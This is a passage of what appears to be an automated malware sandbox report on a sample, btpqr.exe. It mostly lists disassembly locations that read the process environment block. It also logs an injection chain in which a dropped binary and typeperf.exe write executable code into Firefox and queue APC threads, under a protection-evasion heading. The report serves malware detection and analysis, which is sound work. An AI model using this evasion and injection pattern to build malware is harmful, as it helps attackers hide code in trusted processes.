            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD0283 mov eax, dword ptr fs:[00000030h]4_2_00BD0283
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B602E1 mov eax, dword ptr fs:[00000030h]4_2_00B602E1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A2C3 mov eax, dword ptr fs:[00000030h]4_2_00B5A2C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4823B mov eax, dword ptr fs:[00000030h]4_2_00B4823B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A250 mov eax, dword ptr fs:[00000030h]4_2_00C0A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A250 mov eax, dword ptr fs:[00000030h]4_2_00C0A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2625D mov eax, dword ptr fs:[00000030h]4_2_00C2625D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00274 mov eax, dword ptr fs:[00000030h]4_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B54260 mov eax, dword ptr fs:[00000030h]4_2_00B54260
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4826B mov eax, dword ptr fs:[00000030h]4_2_00B4826B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A250 mov eax, dword ptr fs:[00000030h]4_2_00B4A250
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B56259 mov eax, dword ptr fs:[00000030h]4_2_00B56259
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD8243 mov eax, dword ptr fs:[00000030h]4_2_00BD8243
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD8243 mov ecx, dword ptr fs:[00000030h]4_2_00BD8243
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C3CD mov eax, dword ptr fs:[00000030h]4_2_00C0C3CD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B48397 mov eax, dword ptr fs:[00000030h]4_2_00B48397
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7438F mov eax, dword ptr fs:[00000030h]4_2_00B7438F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7438F mov eax, dword ptr fs:[00000030h]4_2_00B7438F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E388 mov eax, dword ptr fs:[00000030h]4_2_00B4E388
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F0 mov eax, dword ptr fs:[00000030h]4_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B863FF mov eax, dword ptr fs:[00000030h]4_2_00B863FF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B603E9 mov eax, dword ptr fs:[00000030h]4_2_00B603E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov ecx, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE3DB mov eax, dword ptr fs:[00000030h]4_2_00BFE3DB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF43D4 mov eax, dword ptr fs:[00000030h]4_2_00BF43D4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF43D4 mov eax, dword ptr fs:[00000030h]4_2_00BF43D4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5A3C0 mov eax, dword ptr fs:[00000030h]4_2_00B5A3C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B583C0 mov eax, dword ptr fs:[00000030h]4_2_00B583C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD63C0 mov eax, dword ptr fs:[00000030h]4_2_00BD63C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2634F mov eax, dword ptr fs:[00000030h]4_2_00C2634F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1A352 mov eax, dword ptr fs:[00000030h]4_2_00C1A352
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C310 mov ecx, dword ptr fs:[00000030h]4_2_00B4C310
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B70310 mov ecx, dword ptr fs:[00000030h]4_2_00B70310
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A30B mov eax, dword ptr fs:[00000030h]4_2_00B8A30B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF437C mov eax, dword ptr fs:[00000030h]4_2_00BF437C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov ecx, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD035C mov eax, dword ptr fs:[00000030h]4_2_00BD035C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov ecx, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C28324 mov eax, dword ptr fs:[00000030h]4_2_00C28324
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF8350 mov ecx, dword ptr fs:[00000030h]4_2_00BF8350
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD2349 mov eax, dword ptr fs:[00000030h]4_2_00BD2349
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B844B0 mov ecx, dword ptr fs:[00000030h]4_2_00B844B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDA4B0 mov eax, dword ptr fs:[00000030h]4_2_00BDA4B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B564AB mov eax, dword ptr fs:[00000030h]4_2_00B564AB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B504E5 mov ecx, dword ptr fs:[00000030h]4_2_00B504E5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A49A mov eax, dword ptr fs:[00000030h]4_2_00C0A49A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A430 mov eax, dword ptr fs:[00000030h]4_2_00B8A430
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C427 mov eax, dword ptr fs:[00000030h]4_2_00B4C427
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4E420 mov eax, dword ptr fs:[00000030h]4_2_00B4E420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0A456 mov eax, dword ptr fs:[00000030h]4_2_00C0A456
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6420 mov eax, dword ptr fs:[00000030h]4_2_00BD6420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B88402 mov eax, dword ptr fs:[00000030h]4_2_00B88402
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7A470 mov eax, dword ptr fs:[00000030h]4_2_00B7A470
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDC460 mov ecx, dword ptr fs:[00000030h]4_2_00BDC460
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4645D mov eax, dword ptr fs:[00000030h]4_2_00B4645D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7245A mov eax, dword ptr fs:[00000030h]4_2_00B7245A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E443 mov eax, dword ptr fs:[00000030h]4_2_00B8E443
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B745B1 mov eax, dword ptr fs:[00000030h]4_2_00B745B1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B745B1 mov eax, dword ptr fs:[00000030h]4_2_00B745B1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD05A7 mov eax, dword ptr fs:[00000030h]4_2_00BD05A7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E59C mov eax, dword ptr fs:[00000030h]4_2_00B8E59C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B84588 mov eax, dword ptr fs:[00000030h]4_2_00B84588
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52582 mov eax, dword ptr fs:[00000030h]4_2_00B52582
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52582 mov ecx, dword ptr fs:[00000030h]4_2_00B52582
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7E5E7 mov eax, dword ptr fs:[00000030h]4_2_00B7E5E7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B525E0 mov eax, dword ptr fs:[00000030h]4_2_00B525E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C5ED mov eax, dword ptr fs:[00000030h]4_2_00B8C5ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8C5ED mov eax, dword ptr fs:[00000030h]4_2_00B8C5ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B565D0 mov eax, dword ptr fs:[00000030h]4_2_00B565D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A5D0 mov eax, dword ptr fs:[00000030h]4_2_00B8A5D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8A5D0 mov eax, dword ptr fs:[00000030h]4_2_00B8A5D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E5CF mov eax, dword ptr fs:[00000030h]4_2_00B8E5CF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 2_2_0041D192 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 2_2_0040B88B SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Code function: 2_2_0040B8AE SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\typeperf.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6D20E0000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\btpqr.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Section loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Section loaded: unknown target: C:\Windows\SysWOW64\typeperf.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe; Section loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: read write
            Source: C:\Windows\SysWOW64\typeperf.exe; Section loaded: unknown target: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\typeperf.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\typeperf.exe; Thread APC queued: target process: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
            Source: C:\Windows\SysWOW64\typeperf.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6D20E0000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Process created: C:\Users\user\AppData\Local\Temp\btpqr.exe C:\Users\user\AppData\Local\Temp\btpqr.exe
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe; Process created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: 0Program Manager
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446410687.00000000010D1000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838833200.00000000010D0000.00000002.00000001.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838987001.00000000011A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: 2_2_0040E35B cpuid 2_2_0040E35B
